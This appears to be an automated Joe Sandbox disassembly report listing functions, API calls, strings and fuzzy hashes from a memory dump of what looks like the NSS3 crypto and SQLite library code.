Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 977086f56f63c98b3f9be914bfb329e96d8c045190d181aa0106b7a270c29414
Instruction ID: f5c8a847a6a933104b6dbb82c7b336cb36ef30a652d088b4a7c8e1ad9591f690
Opcode Fuzzy Hash: 977086f56f63c98b3f9be914bfb329e96d8c045190d181aa0106b7a270c29414
Instruction Fuzzy Hash: 3D124B30D0925C4FDB35CA288A913E977F6AF4B31CF28C9F9C4A95FA41D2358985CB91

Function 6C85EFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C85C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C85DAE2,?), ref: 6C85C6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C85F0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C85F0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C85F101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C85F11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C92218C), ref: 6C85F183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C85F19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C85F1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C85F1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C85F210

Part of subcall function 6C8052D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C85F1E9,?,00000000,?,?), ref: 6C8052F5
Part of subcall function 6C8052D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C80530F
Part of subcall function 6C8052D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C805326
Part of subcall function 6C8052D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C85F1E9,?,00000000,?,?), ref: 6C805340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C85F227

Part of subcall function 6C84FAB0: free.MOZGLUE(?,-00000001,?,?,6C7EF673,00000000,00000000), ref: 6C84FAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C85F23E

Part of subcall function 6C84BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C7FE708,00000000,00000000,00000004,00000000), ref: 6C84BE6A
Part of subcall function 6C84BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C8004DC,?), ref: 6C84BE7E
Part of subcall function 6C84BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C84BEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C85F2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C85F3A8

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C85F3B3

Part of subcall function 6C802D20: PK11_DestroyObject.NSS3(?,?), ref: 6C802D3C
Part of subcall function 6C802D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C802D5F

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 2e45f471adac535abdfe75e6e3a410e4a2dbe42cc0a9c3d9712538efb32cce66
Instruction ID: 70683d0b8bcd908bc5b117a9de10b620d749361763eb75cae80aa09e836d9c32
Opcode Fuzzy Hash: 2e45f471adac535abdfe75e6e3a410e4a2dbe42cc0a9c3d9712538efb32cce66
Instruction Fuzzy Hash: 1DD1D1B6E012099FEB60CFA9CA80A9EB7F5FF58308F548839D915A7701E771E815CB50

Function 6C77ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C77ED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C77EE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C77EF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C77EF98

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C77F483
%s at line %d of [%.10s], xrefs: 6C77F492
database corruption, xrefs: 6C77F48D

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: 89cc76f963e726f1bdb0f5a1f79ded94e5eceedb21edbcd2180214ec6c0b7d74
Instruction ID: 15d979a8be14a9467cd0162be668d965d87f801a63cebaf390bbe2f334908c0c
Opcode Fuzzy Hash: 89cc76f963e726f1bdb0f5a1f79ded94e5eceedb21edbcd2180214ec6c0b7d74
Instruction Fuzzy Hash: 46620470A0424DCFEF24CF24C74479ABBB1BF45318F2845A9D8555BB92D735E886CBA0

Function 6C820EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C820F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C820FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C821006
PK11_FreeSymKey.NSS3(?), ref: 6C82101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C821033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C82103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C821048
memcpy.VCRUNTIME140(?,?,?), ref: 6C82108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C8210BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C8210D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C82112E

Part of subcall function 6C821570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C8208C4,?,?), ref: 6C8215B8
Part of subcall function 6C821570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C8208C4,?,?), ref: 6C8215C1
Part of subcall function 6C821570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C82162E
Part of subcall function 6C821570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C821637

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 97988a50eeb38d9e73a503f62db280facce73f2eb2c95370382f478a369b5f77
Instruction ID: 4dab510f9797ac73ddb0a852556aaa8b871a07d3b2d1e2126d30599f1fb36e91
Opcode Fuzzy Hash: 97988a50eeb38d9e73a503f62db280facce73f2eb2c95370382f478a369b5f77
Instruction Fuzzy Hash: 0F71C1B1A002059FDB20CFA9CA88A6AF7F0BF44318F24892DD90997751E736D984CBC1

Function 6C846C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C7F1C6F,00000000,00000004,?,?), ref: 6C846C3F

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C7F1C6F,00000000,00000004,?,?), ref: 6C846C60
PR_ExplodeTime.NSS3(00000000,6C7F1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C7F1C6F,00000000,00000004,?,?), ref: 6C846C94

Strings

gfff, xrefs: 6C846CFD
gfff, xrefs: 6C846CF5
gfff, xrefs: 6C846D30
gfff, xrefs: 6C846D9C
gfff, xrefs: 6C846D66

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 8d1babbf3de5f602d7b844d247acee77705ffbe51b823ebbc1d31d601b4ad15e
Instruction ID: db01c6cca11bdd75cb53ae2f7c87bef85abea4f585f0d8682d4dab3d43959d62
Opcode Fuzzy Hash: 8d1babbf3de5f602d7b844d247acee77705ffbe51b823ebbc1d31d601b4ad15e
Instruction Fuzzy Hash: 0B516B72B016494FC71CCEADDC927DABBDAABA4310F48C23AE442DB781D638D906C751

Function 6C8C0F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C8C1027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8C10B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8C1353

Strings

%02x, xrefs: 6C8C12F6
%lld, xrefs: 6C8C114B
zeroblob(%d), xrefs: 6C8C1223
-- , xrefs: 6C8C0FF5
'%.*q', xrefs: 6C8C1217, 6C8C1292
$, xrefs: 6C8C12A0
NULL, xrefs: 6C8C119E

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: d3625a52a34aa4eeca90843921e3122ea5ee14f678b91f3d23cd325f6236fe65
Instruction ID: 656e47d55f87f1cd9a4229f46007ae22743a5632d004e647e775d35b3bcfc660
Opcode Fuzzy Hash: d3625a52a34aa4eeca90843921e3122ea5ee14f678b91f3d23cd325f6236fe65
Instruction Fuzzy Hash: 07E1AC71A083409FD720CF68C980A6BBBF1AF85358F188D2DE99587B51E775E849CB43

Function 6C8C8FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8C8FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8C90DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8C9118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8C915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8C91C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8C9209

Strings

3333, xrefs: 6C8C925E
UUUU, xrefs: 6C8C9255

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 8b372db5efd321a14438846ce41fe0673b9503d9d0293f548b89e0e6ce369d18
Instruction ID: 4a4d973355bed5660f18603e76ce6ad6910c0ca5ba6d89366e9a417ec171d993
Opcode Fuzzy Hash: 8b372db5efd321a14438846ce41fe0673b9503d9d0293f548b89e0e6ce369d18
Instruction Fuzzy Hash: A6A1AF72F001159BDB14CB68CD80BAEB7B5BF48328F194569E919B7381E736EC11CBA1

Function 6C780FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C77CA30: EnterCriticalSection.KERNEL32(?,?,?,6C7DF9C9,?,6C7DF4DA,6C7DF9C9,?,?,6C7A369A), ref: 6C77CA7A
Part of subcall function 6C77CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C77CB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C78103E
EnterCriticalSection.KERNEL32(?), ref: 6C781139
LeaveCriticalSection.KERNEL32(?), ref: 6C781190
sqlite3_free.NSS3(00000000), ref: 6C781227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C78126E
sqlite3_free.NSS3(?), ref: 6C78127F

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6C781267
winAccess, xrefs: 6C78129B

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1873940834
Opcode ID: 113215d2fc96f0af8bdc750cfd7f2b67f8323f75b6d50a0d1468e99ca57cc631
Instruction ID: 9a18a53b13c5565055fa934b521dfade59ac04bd220910fc401bbdd915ec3e58
Opcode Fuzzy Hash: 113215d2fc96f0af8bdc750cfd7f2b67f8323f75b6d50a0d1468e99ca57cc631
Instruction Fuzzy Hash: 84711E31B0A201DBEB14DF25DE45A6B7375FB86368F644639EA3587680DB30D805CB92

Function 6C78AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C8ACF46,?,6C77CDBD,?,6C8ABF31,?,?,?,?,?,?,?), ref: 6C78B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C8ACF46,?,6C77CDBD,?,6C8ABF31), ref: 6C78B090
sqlite3_free.NSS3(?,?,?,?,?,?,6C8ACF46,?,6C77CDBD,?,6C8ABF31), ref: 6C78B0A2
CloseHandle.KERNEL32(?,?,6C8ACF46,?,6C77CDBD,?,6C8ABF31,?,?,?,?,?,?,?,?,?), ref: 6C78B100
sqlite3_free.NSS3(?,?,00000002,?,6C8ACF46,?,6C77CDBD,?,6C8ABF31,?,?,?,?,?,?,?), ref: 6C78B115
sqlite3_free.NSS3(?,?,?,?,?,?,6C8ACF46,?,6C77CDBD,?,6C8ABF31), ref: 6C78B12D

Part of subcall function 6C779EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C78C6FD,?,?,?,?,6C7DF965,00000000), ref: 6C779F0E
Part of subcall function 6C779EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C7DF965,00000000), ref: 6C779F5D

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: 1f608b6b5cb670c45ce028c6dd84a1875ef09c889b34a85d2bcf903dcaf745ff
Instruction ID: 613a19463aa98c1a87c0010b631a738c9aaf59e141fbba0404509a12082e09db
Opcode Fuzzy Hash: 1f608b6b5cb670c45ce028c6dd84a1875ef09c889b34a85d2bcf903dcaf745ff
Instruction Fuzzy Hash: 5E91D0B1A09205CFEB14CF39CE84A6BB7B1BF45318F244A3DE51697A90EB31E854CB51

Function 6C908D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C9514E4,6C8BCC70), ref: 6C908D47
PR_GetCurrentThread.NSS3 ref: 6C908D98

Part of subcall function 6C7E0F00: PR_GetPageSize.NSS3(6C7E0936,FFFFE8AE,?,6C7716B7,00000000,?,6C7E0936,00000000,?,6C77204A), ref: 6C7E0F1B
Part of subcall function 6C7E0F00: PR_NewLogModule.NSS3(clock,6C7E0936,FFFFE8AE,?,6C7716B7,00000000,?,6C7E0936,00000000,?,6C77204A), ref: 6C7E0F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C908E7B
htons.WSOCK32(?), ref: 6C908EDB
PR_GetCurrentThread.NSS3 ref: 6C908F99
PR_GetCurrentThread.NSS3 ref: 6C90910A

Strings

%u.%u.%u.%u, xrefs: 6C908E74

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 874125cf8cf88d88de94cdc241dd0a07df8f2c23a9f8572a16b0c1cedd4078c9
Instruction ID: c701d294cf1f9d11f2530ace676804d391c7663459d1fa79b367b54171dc5e43
Opcode Fuzzy Hash: 874125cf8cf88d88de94cdc241dd0a07df8f2c23a9f8572a16b0c1cedd4078c9
Instruction Fuzzy Hash: 8F029D31B092518FDB18CF19C46876ABBB7EF82308F1A825ED8915FB92C375DA45C790

Function 6C8AA480 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 235COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C8CC3A2,?,?,00000000,00000000), ref: 6C8AA528
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8AA6E0
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8AA71B
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8AA738

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8AA6CA
%s at line %d of [%.10s], xrefs: 6C8AA6D9
database corruption, xrefs: 6C8AA6D4

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 622669576-598938438
Opcode ID: b523c8960f41bf62d5d521d350c3129f24654f1e35cdb4f558e94a9de749c6bb
Instruction ID: 1a8375a1033144606dcee67a3ad1e549db32760edaafc62d4e7aac3c99d09e81
Opcode Fuzzy Hash: b523c8960f41bf62d5d521d350c3129f24654f1e35cdb4f558e94a9de749c6bb
Instruction Fuzzy Hash: 87919F716083158BC724CFA8C5806AAB7E1BF48314F554E6DE8958BFA1E770EC46CF92

Function 6C78EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

sqlite_master, xrefs: 6C78F0AB, 6C78F2DA, 6C78F757, 6C78F93E
view, xrefs: 6C78F061, 6C78F071, 6C78FAB7
temporary table name must be unqualified, xrefs: 6C78F734
table, xrefs: 6C78F05C, 6C78FABC, 6C78FAC7
sqlite_temp_master, xrefs: 6C78F0A6, 6C78F2D5
there is already an index named %s, xrefs: 6C78F9D7
%s %T already exists, xrefs: 6C78FAC8
not authorized, xrefs: 6C78F957, 6C78F9BA
authorizer malfunction, xrefs: 6C78F95C, 6C78F9BF, 6C78FA5E, 6C78FA8B

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: 52d4c44e79368f040d23d8c9b21c3cf550b6102f9a79d2c5717f354ad54d6835
Instruction ID: a4017c25ac5fcae9f1077a30a500fab923e460cb2cd682e8b88edbfc1e204768
Opcode Fuzzy Hash: 52d4c44e79368f040d23d8c9b21c3cf550b6102f9a79d2c5717f354ad54d6835
Instruction Fuzzy Hash: AF72CF70E052058FDB14CF69C584BAABBF1BF49308F1482BDCA15ABB52D775E846CB90

Function 6C804420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6C804444
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C804466

Part of subcall function 6C851200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7F88A4,00000000,00000000), ref: 6C851228
Part of subcall function 6C851200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C851238
Part of subcall function 6C851200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7F88A4,00000000,00000000), ref: 6C85124B
